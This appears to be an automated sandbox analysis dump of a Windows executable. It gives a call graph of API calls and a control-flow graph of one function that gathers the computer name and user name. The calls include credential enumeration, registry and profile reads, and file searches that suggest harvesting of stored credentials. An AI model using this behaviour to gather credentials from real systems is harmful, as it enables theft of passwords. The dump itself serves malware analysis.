33198->33192 33200 44b417 33199->33200 33202 44b454 33199->33202 33231 44b42b GetProcAddress 33200->33231 33204 44b45d GetModuleHandleA 33202->33204 33205 44b49a 33202->33205 33211 44b467 33202->33211 33203 44b41c 33203->33202 33207 44b428 GetProcAddress 33203->33207 33204->33211 33206 44b49f 772 API calls 33205->33206 33206->33205 33207->33202 33208 44b435 VirtualProtect 33207->33208 33208->33202 33209 44b444 VirtualProtect 33208->33209 33209->33202 33210 44b487 GetProcAddress 33210->33202 33211->33202 33211->33210 33213 444c4a 33212->33213 33214 444c56 GetModuleHandleA 33213->33214 33215 444c68 __set_app_type __p__fmode __p__commode 33214->33215 33217 444cfa 33215->33217 33218 444d02 __setusermatherr 33217->33218 33219 444d0e 33217->33219 33218->33219 33240 444e22 _controlfp 33219->33240 33221 444d13 _initterm __getmainargs _initterm 33222 444d6a GetStartupInfoA 33221->33222 33224 444d9e GetModuleHandleA 33222->33224 33241 40cf44 33224->33241 33228 444dcf _cexit 33230 444e04 33228->33230 33229 444dc8 exit 33229->33228 33230->33190 33232 44b454 33231->33232 33233 44b435 VirtualProtect 33231->33233 33235 44b45d GetModuleHandleA 33232->33235 33236 44b49a 33232->33236 33233->33232 33234 44b444 VirtualProtect 33233->33234 33234->33232 33239 44b467 33235->33239 33237 44b49f 772 API calls 33236->33237 33237->33236 33238 44b487 GetProcAddress 33238->33239 33239->33232 33239->33238 33240->33221 33292 404a99 LoadLibraryA 33241->33292 33243 40cf60 33278 40cf64 33243->33278 33299 410d0e 33243->33299 33245 40cf6f 33303 40ccd7 ??2@YAPAXI 33245->33303 33247 40cf9b 33317 407cbc 33247->33317 33252 40cfc4 33335 409825 memset 33252->33335 33253 40cfd8 33340 4096f4 memset 33253->33340 33258 40d181 ??3@YAXPAX 33260 40d1b3 33258->33260 33261 40d19f DeleteObject 33258->33261 33259 407e30 _strcmpi 33262 40cfee 33259->33262 33364 407948 free free 33260->33364 33261->33260 33264 40cff2 RegDeleteKeyA 33262->33264 33265 40d007 EnumResourceTypesA 33262->33265 33264->33258 33267 40d02f MessageBoxA 33265->33267 33270 40d047 33265->33270 33266 40d1c4 33365 4080d4 free 33266->33365 33267->33258 33269 40d0a0 CoInitialize 33362 40cc26 strncat memset RegisterClassA CreateWindowExA 33269->33362 33270->33269 33345 40ce70 33270->33345 33272 40d1cd 33366 407948 free free 33272->33366 33274 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33363 40c256 PostMessageA 33274->33363 33278->33228 33278->33229 33279 40d061 ??3@YAXPAX 33279->33260 33282 40d084 DeleteObject 33279->33282 33280 40d09e 33280->33269 33282->33260 33284 40d0f9 GetMessageA 33285 40d17b CoUninitialize 33284->33285 33286 40d10d 33284->33286 33285->33258 33287 40d113 TranslateAccelerator 33286->33287 33289 40d145 IsDialogMessage 33286->33289 33290 40d139 IsDialogMessage 33286->33290 33287->33286 33288 40d16d GetMessageA 33287->33288 33288->33285 33288->33287 33289->33288 33291 40d157 TranslateMessage DispatchMessageA 33289->33291 33290->33288 33290->33289 33291->33288 33293 404ac4 GetProcAddress 33292->33293 33294 404ae8 33292->33294 33295 404ad4 33293->33295 33296 404add FreeLibrary 33293->33296 33297 404b13 33294->33297 33298 404afc MessageBoxA 33294->33298 33295->33296 33296->33294 33297->33243 33298->33243 33300 410d17 LoadLibraryA 33299->33300 33301 410d3c 33299->33301 33300->33301 33302 410d2b GetProcAddress 33300->33302 33301->33245 33302->33301 33304 40cd08 ??2@YAPAXI 33303->33304 33306 40cd26 33304->33306 33307 40cd2d 33304->33307 33374 404025 6 API calls 33306->33374 33309 40cd66 33307->33309 33310 40cd59 DeleteObject 33307->33310 33367 407088 33309->33367 33310->33309 33312 40cd6b 33370 4019b5 33312->33370 33315 4019b5 strncat 33316 40cdbf _mbscpy 33315->33316 33316->33247 33376 407948 free free 33317->33376 33321 407a1f malloc memcpy free free 33324 407cf7 33321->33324 33322 407ddc 33330 407e04 33322->33330 33389 407a1f 33322->33389 33324->33321 33324->33322 33325 407d7a free 33324->33325 33324->33330 33380 40796e 7 API calls 33324->33380 33381 406f30 33324->33381 33325->33324 33377 407a55 33330->33377 33331 407e30 33332 407e57 33331->33332 33333 407e38 33331->33333 33332->33252 33332->33253 33333->33332 33334 407e41 _strcmpi 33333->33334 33334->33332 33334->33333 33395 4097ff 33335->33395 33337 409854 33400 409731 33337->33400 33341 4097ff 3 API calls 33340->33341 33342 409723 33341->33342 33420 40966c 33342->33420 33434 4023b2 33345->33434 33351 40ced3 33523 40cdda 7 API calls 33351->33523 33352 40cece 33355 40cf3f 33352->33355 33475 40c3d0 memset GetModuleFileNameA strrchr 33352->33475 33355->33279 33355->33280 33358 40ceed 33502 40affa 33358->33502 33362->33274 33363->33284 33364->33266 33365->33272 33366->33278 33375 406fc7 memset _mbscpy 33367->33375 33369 40709f CreateFontIndirectA 33369->33312 33371 4019e1 33370->33371 33372 4019c2 strncat 33371->33372 33373 4019e5 memset LoadIconA 33371->33373 33372->33371 33373->33315 33374->33307 33375->33369 33376->33324 33378 407a65 33377->33378 33379 407a5b free 33377->33379 33378->33331 33379->33378 33380->33324 33382 406f37 malloc 33381->33382 33383 406f7d 33381->33383 33385 406f73 33382->33385 33386 406f58 33382->33386 33383->33324 33385->33324 33387 406f6c free 33386->33387 33388 406f5c memcpy 33386->33388 33387->33385 33388->33387 33390 407a38 33389->33390 33391 407a2d free 33389->33391 33392 406f30 3 API calls 33390->33392 33393 407a43 33391->33393 33392->33393 33394 40796e 7 API calls 33393->33394 33394->33330 33411 406f96 GetModuleFileNameA 33395->33411 33397 409805 strrchr 33398 409814 33397->33398 33399 409817 _mbscat 33397->33399 33398->33399 33399->33337 33412 44b090 33400->33412 33405 40930c 3 API calls 33406 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33405->33406 33407 4097c5 LoadStringA 33406->33407 33408 4097db 33407->33408 33408->33407 33410 4097f3 33408->33410 33419 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33408->33419 33410->33258 33411->33397 33413 40973e _mbscpy _mbscpy 33412->33413 33414 40930c 33413->33414 33415 44b090 33414->33415 33416 409319 memset GetPrivateProfileStringA 33415->33416 33417 409374 33416->33417 33418 409364 WritePrivateProfileStringA 33416->33418 33417->33405 33418->33417 33419->33408 33430 406f81 GetFileAttributesA 33420->33430 33422 409675 33423 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33422->33423 33429 4096ee 33422->33429 33431 409278 GetPrivateProfileStringA 33423->33431 33425 4096c9 33432 409278 GetPrivateProfileStringA 33425->33432 33427 4096da 33433 409278 GetPrivateProfileStringA 33427->33433 33429->33259 33430->33422 33431->33425 33432->33427 33433->33429 33525 409c1c 33434->33525 33437 401e69 memset 33564 410dbb 33437->33564 33440 401ec2 33594 4070e3 strlen _mbscat _mbscpy _mbscat 33440->33594 33441 401ed4 33579 406f81 GetFileAttributesA 33441->33579 33444 401ee6 strlen strlen 33446 401f15 33444->33446 33447 401f28 33444->33447 33595 4070e3 strlen _mbscat _mbscpy _mbscat 33446->33595 33580 406f81 GetFileAttributesA 33447->33580 33450 401f35 33581 401c31 33450->33581 33453 401f75 33593 410a9c RegOpenKeyExA 33453->33593 33455 401c31 7 API calls 33455->33453 33456 401f91 33457 402187 33456->33457 33458 401f9c memset 33456->33458 33460 402195 ExpandEnvironmentStringsA 33457->33460 33461 4021a8 _strcmpi 33457->33461 33596 410b62 RegEnumKeyExA 33458->33596 33605 406f81 GetFileAttributesA 33460->33605 33461->33351 33461->33352 33463 40217e RegCloseKey 33463->33457 33464 401fd9 atoi 33465 401fef memset memset sprintf 33464->33465 33473 401fc9 33464->33473 33597 410b1e 33465->33597 33468 402165 33468->33463 33469 406f81 GetFileAttributesA 33469->33473 33470 402076 memset memset strlen strlen 33470->33473 33471 4070e3 strlen _mbscat _mbscpy _mbscat 33471->33473 33472 4020dd strlen strlen 33472->33473 33473->33463 33473->33464 33473->33468 33473->33469 33473->33470 33473->33471 33473->33472 33474 402167 _mbscpy 33473->33474 33604 410b62 RegEnumKeyExA 33473->33604 33474->33463 33476 40c422 33475->33476 33477 40c425 _mbscat _mbscpy _mbscpy 33475->33477 33476->33477 33478 40c49d 33477->33478 33479 40c512 33478->33479 33480 40c502 GetWindowPlacement 33478->33480 33481 40c538 33479->33481 33626 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33479->33626 33480->33479 33619 409b31 33481->33619 33485 40ba28 33486 40ba87 33485->33486 33492 40ba3c 33485->33492 33629 406c62 LoadCursorA SetCursor 33486->33629 33488 40ba8c 33630 4107f1 33488->33630 33633 410a9c RegOpenKeyExA 33488->33633 33634 404734 33488->33634 33642 404785 33488->33642 33645 403c16 33488->33645 33489 40ba43 _mbsicmp 33489->33492 33490 40baa0 33491 407e30 _strcmpi 33490->33491 33495 40bab0 33491->33495 33492->33486 33492->33489 33721 40b5e5 10 API calls 33492->33721 33493 40bafa SetCursor 33493->33358 33495->33493 33496 40baf1 qsort 33495->33496 33496->33493 34078 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33502->34078 33504 40b00e 33505 40b016 33504->33505 33506 40b01f GetStdHandle 33504->33506 34079 406d1a CreateFileA 33505->34079 33508 40b01c 33506->33508 33509 40b035 33508->33509 33510 40b12d 33508->33510 34080 406c62 LoadCursorA SetCursor 33509->34080 34084 406d77 9 API calls 33510->34084 33513 40b136 33524 40c580 28 API calls 33513->33524 33514 40b087 33515 40b0a1 33514->33515 34082 40a699 12 API calls 33514->34082 33519 40b0d6 33515->33519 34083 406d77 9 API calls 33515->34083 33516 40b042 33516->33514 33516->33515 34081 40a57c strlen WriteFile 33516->34081 33520 40b116 CloseHandle 33519->33520 33521 40b11f SetCursor 33519->33521 33520->33521 33521->33513 33523->33352 33524->33355 33537 409a32 33525->33537 33528 409c80 memcpy memcpy 33529 409cda 33528->33529 33529->33528 33530 409d18 ??2@YAPAXI ??2@YAPAXI 33529->33530 33534 408db6 12 API calls 33529->33534 33531 409d54 ??2@YAPAXI 33530->33531 33533 409d8b 33530->33533 33531->33533 33547 409b9c 33533->33547 33534->33529 33536 4023c1 33536->33437 33538 409a44 33537->33538 33539 409a3d ??3@YAXPAX 33537->33539 33540 409a52 33538->33540 33541 409a4b ??3@YAXPAX 33538->33541 33539->33538 33542 409a63 33540->33542 33543 409a5c ??3@YAXPAX 33540->33543 33541->33540 33544 409a83 ??2@YAPAXI ??2@YAPAXI 33542->33544 33545 409a73 ??3@YAXPAX 33542->33545 33546 409a7c ??3@YAXPAX 33542->33546 33543->33542 33544->33528 33545->33546 33546->33544 33548 407a55 free 33547->33548 33549 409ba5 33548->33549 33550 407a55 free 33549->33550 33551 409bad 33550->33551 33552 407a55 free 33551->33552 33553 409bb5 33552->33553 33554 407a55 free 33553->33554 33555 409bbd 33554->33555 33556 407a1f 4 API calls 33555->33556 33557 409bd0 33556->33557 33558 407a1f 4 API calls 33557->33558 33559 409bda 33558->33559 33560 407a1f 4 API calls 33559->33560 33561 409be4 33560->33561 33562 407a1f 4 API calls 33561->33562 33563 409bee 33562->33563 33563->33536 33565 410d0e 2 API calls 33564->33565 33566 410dca 33565->33566 33567 410dfd memset 33566->33567 33606 4070ae 33566->33606 33568 410e1d 33567->33568 33609 410a9c RegOpenKeyExA 33568->33609 33572 401e9e strlen strlen 33572->33440 33572->33441 33573 410e4a 33574 410e7f _mbscpy 33573->33574 33610 410d3d _mbscpy 33573->33610 33574->33572 33576 410e5b 33611 410add RegQueryValueExA 33576->33611 33578 410e73 RegCloseKey 33578->33574 33579->33444 33580->33450 33612 410a9c RegOpenKeyExA 33581->33612 33583 401c4c 33584 401cad 33583->33584 33613 410add RegQueryValueExA 33583->33613 33584->33453 33584->33455 33586 401c6a 33587 401c71 strchr 33586->33587 33588 401ca4 RegCloseKey 33586->33588 33587->33588 33589 401c85 strchr 33587->33589 33588->33584 33589->33588 33590 401c94 33589->33590 33614 406f06 strlen 33590->33614 33592 401ca1 33592->33588 33593->33456 33594->33441 33595->33447 33596->33473 33617 410a9c RegOpenKeyExA 33597->33617 33599 410b34 33600 410b5d 33599->33600 33618 410add RegQueryValueExA 33599->33618 33600->33473 33602 410b4c RegCloseKey 33602->33600 33604->33473 33605->33461 33607 4070bd GetVersionExA 33606->33607 33608 4070ce 33606->33608 33607->33608 33608->33567 33608->33572 33609->33573 33610->33576 33611->33578 33612->33583 33613->33586 33615 406f17 33614->33615 33616 406f1a memcpy 33614->33616 33615->33616 33616->33592 33617->33599 33618->33602 33620 409b40 33619->33620 33622 409b4e 33619->33622 33627 409901 memset SendMessageA 33620->33627 33623 409b99 33622->33623 33624 409b8b 33622->33624 33623->33485 33628 409868 SendMessageA 33624->33628 33626->33481 33627->33622 33628->33623 33629->33488 33631 410807 33630->33631 33632 4107fc FreeLibrary 33630->33632 33631->33490 33632->33631 33633->33490 33635 404785 FreeLibrary 33634->33635 33636 40473b LoadLibraryA 33635->33636 33637 40474c GetProcAddress 33636->33637 33638 40476e 33636->33638 33637->33638 33639 404764 33637->33639 33640 404781 33638->33640 33641 404785 FreeLibrary 33638->33641 33639->33638 33640->33490 33641->33640 33643 4047a3 33642->33643 33644 404799 FreeLibrary 33642->33644 33643->33490 33644->33643 33646 4107f1 FreeLibrary 33645->33646 33647 403c30 LoadLibraryA 33646->33647 33648 403c74 33647->33648 33649 403c44 GetProcAddress 33647->33649 33650 4107f1 FreeLibrary 33648->33650 33649->33648 33651 403c5e 33649->33651 33652 403c7b 33650->33652 33651->33648 33655 403c6b 33651->33655 33653 404734 3 API calls 33652->33653 33654 403c86 33653->33654 33722 4036e5 33654->33722 33655->33652 33658 4036e5 23 API calls 33659 403c9a 33658->33659 33660 4036e5 23 API calls 33659->33660 33661 403ca4 33660->33661 33662 4036e5 23 API calls 33661->33662 33663 403cae 33662->33663 33732 4085d2 33663->33732 33671 403ce5 33672 403cf7 33671->33672 33915 402bd1 40 API calls 33671->33915 33780 410a9c RegOpenKeyExA 33672->33780 33675 403d0a 33676 403d1c 33675->33676 33916 402bd1 40 API calls 33675->33916 33781 402c5d 33676->33781 33680 4070ae GetVersionExA 33681 403d31 33680->33681 33799 410a9c RegOpenKeyExA 33681->33799 33683 403d51 33684 403d61 33683->33684 33917 402b22 47 API calls 33683->33917 33800 410a9c RegOpenKeyExA 33684->33800 33687 403d87 33690 403d97 33687->33690 33918 402b22 47 API calls 33687->33918 33801 410a9c RegOpenKeyExA 33690->33801 33691 403dbd 33692 403dcd 33691->33692 33919 402b22 47 API calls 33691->33919 33802 410808 33692->33802 33696 404785 FreeLibrary 33697 403de8 33696->33697 33806 402fdb 33697->33806 33700 402fdb 34 API calls 33701 403e00 33700->33701 33822 4032b7 33701->33822 33710 403e3b 33712 403e73 33710->33712 33713 403e46 _mbscpy 33710->33713 33869 40fb00 33712->33869 33921 40f334 334 API calls 33713->33921 33721->33492 33723 4036fb 33722->33723 33724 4037c5 33722->33724 33723->33724 33725 403716 strchr 33723->33725 33724->33658 33725->33724 33726 403730 33725->33726 33922 4021b6 memset 33726->33922 33728 40373f _mbscpy _mbscpy strlen 33729 4037a4 _mbscpy 33728->33729 33730 403789 sprintf 33728->33730 33923 4023e5 16 API calls 33729->33923 33730->33729 33733 4085e2 33732->33733 33924 4082cd 11 API calls 33733->33924 33737 408600 33738 403cba 33737->33738 33739 40860b memset 33737->33739 33750 40821d 33738->33750 33927 410b62 RegEnumKeyExA 33739->33927 33741 408637 33742 4086d2 RegCloseKey 33741->33742 33744 40865c memset 33741->33744 33928 410a9c RegOpenKeyExA 33741->33928 33931 410b62 RegEnumKeyExA 33741->33931 33742->33738 33929 410add RegQueryValueExA 33744->33929 33747 408694 33930 40848b 10 API calls 33747->33930 33749 4086ab RegCloseKey 33749->33741 33932 410a9c RegOpenKeyExA 33750->33932 33752 40823f 33753 403cc6 33752->33753 33754 408246 memset 33752->33754 33762 4086e0 33753->33762 33933 410b62 RegEnumKeyExA 33754->33933 33756 4082bf RegCloseKey 33756->33753 33758 40826f 33758->33756 33934 410a9c RegOpenKeyExA 33758->33934 33935 4080ed 11 API calls 33758->33935 33936 410b62 RegEnumKeyExA 33758->33936 33761 4082a2 RegCloseKey 33761->33758 33937 4045db 33762->33937 33766 40872d 33768 408737 wcslen 33766->33768 33770 4088ef 33766->33770 33768->33770 33776 40876a 33768->33776 33769 40872b CredEnumerateW 33769->33766 33945 404656 33770->33945 33771 40877a wcsncmp 33771->33776 33773 404734 3 API calls 33773->33776 33774 404785 FreeLibrary 33774->33776 33775 408812 memset 33775->33776 33777 40883c memcpy wcschr 33775->33777 33776->33770 33776->33771 33776->33773 33776->33774 33776->33775 33776->33777 33778 4088c3 LocalFree 33776->33778 33948 40466b _mbscpy 33776->33948 33777->33776 33778->33776 33779 410a9c RegOpenKeyExA 33779->33671 33780->33675 33949 410a9c RegOpenKeyExA 33781->33949 33783 402c7a 33784 402da5 33783->33784 33785 402c87 memset 33783->33785 33784->33680 33950 410b62 RegEnumKeyExA 33785->33950 33787 402d9c RegCloseKey 33787->33784 33788 402cb2 33788->33787 33789 410b1e 3 API calls 33788->33789 33798 402d9a 33788->33798 33954 402bd1 40 API calls 33788->33954 33955 410b62 RegEnumKeyExA 33788->33955 33790 402ce4 memset sprintf 33789->33790 33951 410a9c RegOpenKeyExA 33790->33951 33792 402d28 33793 402d3a sprintf 33792->33793 33952 402bd1 40 API calls 33792->33952 33953 410a9c RegOpenKeyExA 33793->33953 33798->33787 33799->33683 33800->33687 33801->33691 33803 410816 33802->33803 33804 4107f1 FreeLibrary 33803->33804 33805 403ddd 33804->33805 33805->33696 33956 410a9c RegOpenKeyExA 33806->33956 33808 402ff9 33809 403006 memset 33808->33809 33810 40312c 33808->33810 33957 410b62 RegEnumKeyExA 33809->33957 33810->33700 33812 403033 33813 403122 RegCloseKey 33812->33813 33814 410b1e 3 API calls 33812->33814 33817 4030a2 memset 33812->33817 33819 410b62 RegEnumKeyExA 33812->33819 33820 4030f9 RegCloseKey 33812->33820 33960 402db3 26 API calls 33812->33960 33813->33810 33815 403058 memset sprintf 33814->33815 33958 410a9c RegOpenKeyExA 33815->33958 33959 410b62 RegEnumKeyExA 33817->33959 33819->33812 33820->33812 33823 4032d5 33822->33823 33824 4033a9 33822->33824 33961 4021b6 memset 33823->33961 33837 4034e4 memset memset 33824->33837 33826 4032e1 33962 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33826->33962 33828 4032ea 33829 4032f8 memset GetPrivateProfileSectionA 33828->33829 33963 4023e5 16 API calls 33828->33963 33829->33824 33834 40332f 33829->33834 33831 40339b strlen 33831->33824 33831->33834 33833 403350 strchr 33833->33834 33834->33824 33834->33831 33964 4021b6 memset 33834->33964 33965 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33834->33965 33966 4023e5 16 API calls 33834->33966 33838 410b1e 3 API calls 33837->33838 33839 40353f 33838->33839 33840 40357f 33839->33840 33841 403546 _mbscpy 33839->33841 33845 403985 33840->33845 33967 406d55 strlen _mbscat 33841->33967 33843 403565 _mbscat 33968 4033f0 19 API calls 33843->33968 33969 40466b _mbscpy 33845->33969 33847 4039aa 33851 4039ff 33847->33851 33970 40f460 memset memset 33847->33970 33991 40f6e2 33847->33991 34007 4038e8 21 API calls 33847->34007 33852 404785 FreeLibrary 33851->33852 33853 403a0b 33852->33853 33854 4037ca memset memset 33853->33854 34015 444551 memset 33854->34015 33857 4038e2 33857->33710 33920 40f334 334 API calls 33857->33920 33859 40382e 33860 406f06 2 API calls 33859->33860 33861 403843 33860->33861 33862 406f06 2 API calls 33861->33862 33863 403855 strchr 33862->33863 33864 403884 _mbscpy 33863->33864 33865 403897 strlen 33863->33865 33866 4038bf _mbscpy 33864->33866 33865->33866 33867 4038a4 sprintf 33865->33867 34027 4023e5 16 API calls 33866->34027 33867->33866 33870 44b090 33869->33870 33871 40fb10 RegOpenKeyExA 33870->33871 33872 403e7f 33871->33872 33873 40fb3b RegOpenKeyExA 33871->33873 33883 40f96c 33872->33883 33874 40fb55 RegQueryValueExA 33873->33874 33875 40fc2d RegCloseKey 33873->33875 33876 40fc23 RegCloseKey 33874->33876 33877 40fb84 33874->33877 33875->33872 33876->33875 33878 404734 3 API calls 33877->33878 33879 40fb91 33878->33879 33879->33876 33880 40fc19 LocalFree 33879->33880 33881 40fbdd memcpy memcpy 33879->33881 33880->33876 34032 40f802 11 API calls 33881->34032 33884 4070ae GetVersionExA 33883->33884 33885 40f98d 33884->33885 33886 4045db 7 API calls 33885->33886 33894 40f9a9 33886->33894 33887 40fae6 33888 404656 FreeLibrary 33887->33888 33889 403e85 33888->33889 33895 4442ea memset 33889->33895 33890 40fa13 memset WideCharToMultiByte 33891 40fa43 _strnicmp 33890->33891 33890->33894 33892 40fa5b WideCharToMultiByte 33891->33892 33891->33894 33893 40fa88 WideCharToMultiByte 33892->33893 33892->33894 33893->33894 33894->33887 33894->33890 33896 410dbb 9 API calls 33895->33896 33897 444329 33896->33897 34033 40759e strlen strlen 33897->34033 33902 410dbb 9 API calls 33903 444350 33902->33903 33904 40759e 3 API calls 33903->33904 33905 44435a 33904->33905 33906 444212 65 API calls 33905->33906 33907 444366 memset memset 33906->33907 33908 410b1e 3 API calls 33907->33908 33909 4443b9 ExpandEnvironmentStringsA strlen 33908->33909 33910 4443f4 _strcmpi 33909->33910 33911 4443e5 33909->33911 33912 403e91 33910->33912 33913 44440c 33910->33913 33911->33910 33912->33490 33914 444212 65 API calls 33913->33914 33914->33912 33915->33672 33916->33676 33917->33684 33918->33690 33919->33692 33920->33710 33921->33712 33922->33728 33923->33724 33925 40841c 33924->33925 33926 410a9c RegOpenKeyExA 33925->33926 33926->33737 33927->33741 33928->33741 33929->33747 33930->33749 33931->33741 33932->33752 33933->33758 33934->33758 33935->33761 33936->33758 33938 404656 FreeLibrary 33937->33938 33939 4045e3 LoadLibraryA 33938->33939 33940 404651 33939->33940 33941 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33939->33941 33940->33766 33940->33769 33940->33770 33942 40463d 33941->33942 33943 404643 33942->33943 33944 404656 FreeLibrary 33942->33944 33943->33940 33944->33940 33946 403cd2 33945->33946 33947 40465c FreeLibrary 33945->33947 33946->33779 33947->33946 33948->33776 33949->33783 33950->33788 33951->33792 33952->33793 33953->33788 33954->33788 33955->33788 33956->33808 33957->33812 33958->33812 33959->33812 33960->33812 33961->33826 33962->33828 33963->33829 33964->33833 33965->33834 33966->33834 33967->33843 33968->33840 33969->33847 34008 4078ba 33970->34008 33973 4078ba _mbsnbcat 33974 40f5a3 RegOpenKeyExA 33973->33974 33975 40f5c3 RegQueryValueExA 33974->33975 33976 40f6d9 33974->33976 33977 40f6d0 RegCloseKey 33975->33977 33978 40f5f0 33975->33978 33976->33847 33977->33976 33978->33977 33979 40f675 33978->33979 34012 40466b _mbscpy 33978->34012 33979->33977 34013 4012ee strlen 33979->34013 33981 40f611 33983 404734 3 API calls 33981->33983 33988 40f616 33983->33988 33984 40f69e RegQueryValueExA 33984->33977 33985 40f6c1 33984->33985 33985->33977 33986 40f66a 33987 404785 FreeLibrary 33986->33987 33987->33979 33988->33986 33989 40f661 LocalFree 33988->33989 33990 40f645 memcpy 33988->33990 33989->33986 33990->33989 34014 40466b _mbscpy 33991->34014 33993 40f6fa 33994 4045db 7 API calls 33993->33994 33995 40f708 33994->33995 33996 40f7e2 33995->33996 33997 404734 3 API calls 33995->33997 33998 404656 FreeLibrary 33996->33998 34002 40f715 33997->34002 33999 40f7f1 33998->33999 34000 404785 FreeLibrary 33999->34000 34001 40f7fc 34000->34001 34001->33847 34002->33996 34003 40f797 WideCharToMultiByte 34002->34003 34004 40f7b8 strlen 34003->34004 34005 40f7d9 LocalFree 34003->34005 34004->34005 34006 40f7c8 _mbscpy 34004->34006 34005->33996 34006->34005 34007->33847 34009 4078e6 34008->34009 34010 4078c7 _mbsnbcat 34009->34010 34011 4078ea 34009->34011 34010->34009 34011->33973 34012->33981 34013->33984 34014->33993 34028 410a9c RegOpenKeyExA 34015->34028 34017 44458b 34018 40381a 34017->34018 34029 410add RegQueryValueExA 34017->34029 34018->33857 34026 4021b6 memset 34018->34026 34020 4445dc RegCloseKey 34020->34018 34021 4445a4 34021->34020 34030 410add RegQueryValueExA 34021->34030 34023 4445c1 34023->34020 34031 444879 30 API calls 34023->34031 34025 4445da 34025->34020 34026->33859 34027->33857 34028->34017 34029->34021 34030->34023 34031->34025 34032->33880 34034 4075c9 34033->34034 34035 4075bb _mbscat 34033->34035 34036 444212 34034->34036 34035->34034 34053 407e9d 34036->34053 34039 44424d 34040 444274 34039->34040 34041 444258 34039->34041 34061 407ef8 34039->34061 34042 407e9d 9 API calls 34040->34042 34074 444196 52 API calls 34041->34074 34049 4442a0 34042->34049 34044 407ef8 9 API calls 34044->34049 34045 4442ce 34071 407f90 34045->34071 34049->34044 34049->34045 34051 444212 65 API calls 34049->34051 34075 407e62 strcmp strcmp 34049->34075 34050 407f90 FindClose 34052 4442e4 34050->34052 34051->34049 34052->33902 34054 407f90 FindClose 34053->34054 34055 407eaa 34054->34055 34056 406f06 2 API calls 34055->34056 34057 407ebd strlen strlen 34056->34057 34058 407ee1 34057->34058 34059 407eea 34057->34059 34076 4070e3 strlen _mbscat _mbscpy _mbscat 34058->34076 34059->34039 34062 407f03 FindFirstFileA 34061->34062 34063 407f24 FindNextFileA 34061->34063 34066 407f3f 34062->34066 34064 407f46 strlen strlen 34063->34064 34065 407f3a 34063->34065 34068 407f7f 34064->34068 34069 407f76 34064->34069 34067 407f90 FindClose 34065->34067 34066->34064 34066->34068 34067->34066 34068->34039 34077 4070e3 strlen _mbscat _mbscpy _mbscat 34069->34077 34072 407fa3 34071->34072 34073 407f99 FindClose 34071->34073 34072->34050 34073->34072 34074->34039 34075->34049 34076->34059 34077->34068 34078->33504 34079->33508 34080->33516 34081->33514 34082->33515 34083->33519 34084->33513 34430 43ffc8 18 API calls 34244 4281cc 15 API calls __fprintf_l 34432 4383cc 110 API calls __fprintf_l 34245 4275d3 41 API calls 34433 4153d3 22 API calls __fprintf_l 34246 444dd7 _XcptFilter 34438 4013de 15 API calls 34440 425115 111 API calls __fprintf_l 34441 43f7db 18 API calls 34444 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34248 4335ee 16 API calls __fprintf_l 34446 429fef 11 API calls 34249 444deb _exit _c_exit 34447 40bbf0 138 API calls 34252 425115 79 API calls __fprintf_l 34451 437ffa 22 API calls 34256 4021ff 14 API calls 34257 43f5fc 149 API calls 34452 40e381 9 API calls 34259 405983 40 API calls 34260 42b186 27 API calls __fprintf_l 34261 427d86 76 API calls 34262 403585 20 API calls 34264 42e58e 18 API calls __fprintf_l 34267 425115 75 API calls __fprintf_l 34269 401592 8 API calls 33172 410b92 33175 410a6b 33172->33175 33174 410bb2 33176 410a77 33175->33176 33177 410a89 GetPrivateProfileIntA 33175->33177 33180 410983 memset _itoa WritePrivateProfileStringA 33176->33180 33177->33174 33179 410a84 33179->33174 33180->33179 34456 434395 16 API calls 34271 441d9c memcmp 34458 43f79b 119 API calls 34272 40c599 43 API calls 34459 426741 87 API calls 34276 4401a6 21 API calls 34278 426da6 memcpy memset memset memcpy 34279 4335a5 15 API calls 34281 4299ab memset memset memcpy memset memset 34282 40b1ab 8 API calls 34464 425115 76 API calls __fprintf_l 34468 4113b2 18 API calls 2 library calls 34472 40a3b8 memset sprintf SendMessageA 34085 410bbc 34088 4109cf 34085->34088 34089 4109dc 34088->34089 34090 410a23 memset GetPrivateProfileStringA 34089->34090 34091 4109ea memset 34089->34091 34096 407646 strlen 34090->34096 34101 4075cd sprintf memcpy 34091->34101 34094 410a0c WritePrivateProfileStringA 34095 410a65 34094->34095 34097 40765a 34096->34097 34098 40765c 34096->34098 34097->34095 34100 4076a3 34098->34100 34102 40737c strtoul 34098->34102 34100->34095 34101->34094 34102->34098 34284 40b5bf memset memset _mbsicmp

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040832F
                                                                                                    • memset.MSVCRT ref: 00408343
                                                                                                    • memset.MSVCRT ref: 0040835F
                                                                                                    • memset.MSVCRT ref: 00408376
                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                    • strlen.MSVCRT ref: 004083E9
                                                                                                    • strlen.MSVCRT ref: 004083F8
                                                                                                    • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
